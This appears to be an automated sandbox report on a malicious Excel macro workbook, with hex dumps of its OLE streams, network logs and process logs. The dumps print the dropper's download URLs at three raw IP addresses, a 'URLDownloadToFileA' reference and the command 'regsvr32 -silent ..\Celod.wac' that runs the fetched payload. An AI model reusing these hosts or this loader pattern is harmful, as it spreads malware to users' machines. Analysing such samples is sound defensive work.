    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
    General
    Stream Path:\x5SummaryInformation
    File Type:data
    Stream Size:208
    Entropy:3.33231709703
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . r . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101931
    General
    Stream Path:Workbook
    File Type:Applesoft BASIC program data, first line number 16
    Stream Size:101931
    Entropy:7.65144710562
    Base64 Encoded:True
    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V q % 8 . . . . . . . X . @
    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 704
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:704
    Entropy:5.29068090087
    Base64 Encoded:True
    Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0
    Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37
    Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECTlk
    File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
    Stream Size:30
    Entropy:1.37215976263
    Base64 Encoded:False
    Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
    Data Raw:01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 140
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
    File Type:data
    Stream Size:140
    Entropy:3.43277227638
    Base64 Encoded:False
    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00
    Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
    File Type:data
    Stream Size:97
    Entropy:3.61064918306
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
    File Type:ASCII text, with CRLF line terminators
    Stream Size:302
    Entropy:4.66028783691
    Base64 Encoded:True
    Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
    Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
    Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 283
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/f
    File Type:data
    Stream Size:283
    Entropy:3.66259370036
    Base64 Encoded:False
    Data ASCII:. . ( . H . . . . . . . . @ . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 5 . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . D . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 t . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . P . . . . . . . L a b e l
    Data Raw:00 04 28 00 48 0c 10 0c 0b 00 00 00 04 40 00 00 ff ff 00 00 12 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 04 00 00 00 b4 00 00 00 00 84 01 00 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 35 00 d4
    Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 292
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/o
    File Type:data
    Stream Size:292
    Entropy:3.97404939222
    Base64 Encoded:True
    Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 6 5 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . $ . ( . . . . . . . h t t p : / / 5 . 1 9 6 . 2 4 7 . 1 1 / . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 8 . 1 1 9 . 1 1 3 . 3 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . 0 . ( . . . . . . . r e g s v r 3 2 - s i l e n t . . \\ C e l o d . w a c . . .
    Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 36 35 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 24 00 28 00 00 00 14 00 00 80 68 74 74 70 3a 2f 2f 35 2e 31 39 36 2e 32 34 37 2e 31 31 2f 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4544
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
    File Type:data
    Stream Size:4544
    Entropy:4.47759533359
    Base64 Encoded:False
    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
    Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2514
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
    File Type:data
    Stream Size:2514
    Entropy:3.52144078534
    Base64 Encoded:False
    Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . < . . . ] . . N
    Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 04 00 00 00 00 00 01 00 02 00 04 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 146
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
    File Type:data
    Stream Size:146
    Entropy:1.48909835582
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 213
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
    File Type:data
    Stream Size:213
    Entropy:1.85324367791
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0c 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 206
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
    File Type:data
    Stream Size:206
    Entropy:1.75287863305
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1075
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/dir
    File Type:data
    Stream Size:1075
    Entropy:6.6867836299
    Base64 Encoded:True
    Data ASCII:. / . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . R c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
    Data Raw:01 2f b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 bd 98 a0 52 63 01 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

    Network Behavior

    Snort IDS Alerts

    Timestamp                | Protocol | SID | Message                                       | Source Port | Dest Port | Source IP       | Dest IP
    10/08/21-22:31:07.677315 | ICMP     | 399 | ICMP Destination Unreachable Host Unreachable |             |           | 186.148.101.114 | 192.168.2.22
    10/08/21-22:31:11.677211 | ICMP     | 399 | ICMP Destination Unreachable Host Unreachable |             |           | 186.148.101.114 | 192.168.2.22
    10/08/21-22:31:19.027109 | ICMP     | 399 | ICMP Destination Unreachable Host Unreachable |             |           | 186.148.101.114 | 192.168.2.22
    10/08/21-22:31:29.867071 | ICMP     | 399 | ICMP Destination Unreachable Host Unreachable |             |           | 186.148.101.114 | 192.168.2.22
    10/08/21-22:31:34.047252 | ICMP     | 399 | ICMP Destination Unreachable Host Unreachable |             |           | 186.148.101.114 | 192.168.2.22
    10/08/21-22:31:40.057139 | ICMP     | 399 | ICMP Destination Unreachable Host Unreachable |             |           | 186.148.101.114 | 192.168.2.22

    Network Port Distribution

    TCP Packets

    Timestamp                          | Source Port | Dest Port | Source IP    | Dest IP
    Oct 8, 2021 22:31:06.830949068 CEST | 49167       | 80        | 192.168.2.22 | 190.14.37.165
    Oct 8, 2021 22:31:09.835529089 CEST | 49167       | 80        | 192.168.2.22 | 190.14.37.165
    Oct 8, 2021 22:31:15.842176914 CEST | 49167       | 80        | 192.168.2.22 | 190.14.37.165
    Oct 8, 2021 22:31:27.858150959 CEST | 49168       | 80        | 192.168.2.22 | 190.14.37.165
    Oct 8, 2021 22:31:30.866389036 CEST | 49168       | 80        | 192.168.2.22 | 190.14.37.165
    Oct 8, 2021 22:31:36.872767925 CEST | 49168       | 80        | 192.168.2.22 | 190.14.37.165
    Oct 8, 2021 22:31:48.918448925 CEST | 49169       | 80        | 192.168.2.22 | 5.196.247.11
    Oct 8, 2021 22:31:51.928092003 CEST | 49169       | 80        | 192.168.2.22 | 5.196.247.11
    Oct 8, 2021 22:31:57.934708118 CEST | 49169       | 80        | 192.168.2.22 | 5.196.247.11
    Oct 8, 2021 22:32:09.950108051 CEST | 49170       | 80        | 192.168.2.22 | 5.196.247.11
    Oct 8, 2021 22:32:12.958657980 CEST | 49170       | 80        | 192.168.2.22 | 5.196.247.11
    Oct 8, 2021 22:32:18.965198040 CEST | 49170       | 80        | 192.168.2.22 | 5.196.247.11
    Oct 8, 2021 22:32:31.013303041 CEST | 49171       | 80        | 192.168.2.22 | 188.119.113.3
    Oct 8, 2021 22:32:34.020548105 CEST | 49171       | 80        | 192.168.2.22 | 188.119.113.3
    Oct 8, 2021 22:32:40.027221918 CEST | 49171       | 80        | 192.168.2.22 | 188.119.113.3
    Oct 8, 2021 22:32:52.042889118 CEST | 49172       | 80        | 192.168.2.22 | 188.119.113.3
    Oct 8, 2021 22:32:55.051162958 CEST | 49172       | 80        | 192.168.2.22 | 188.119.113.3
    Oct 8, 2021 22:33:01.057859898 CEST | 49172       | 80        | 192.168.2.22 | 188.119.113.3

    Code Manipulations

    Statistics

    CPU Usage

    Memory Usage

    High Level Behavior Distribution

    Behavior

    System Behavior

    General

    Start time:22:30:16
    Start date:08/10/2021
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13fcb0000
    File size:28253536 bytes
    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:22:32:26
    Start date:08/10/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -silent ..\Celod.wac
    Imagebase:0xff9c0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:22:32:26
    Start date:08/10/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -silent ..\Celod.wac1
    Imagebase:0xff9c0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:22:32:26
    Start date:08/10/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -silent ..\Celod.wac2
    Imagebase:0xff9c0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Code Analysis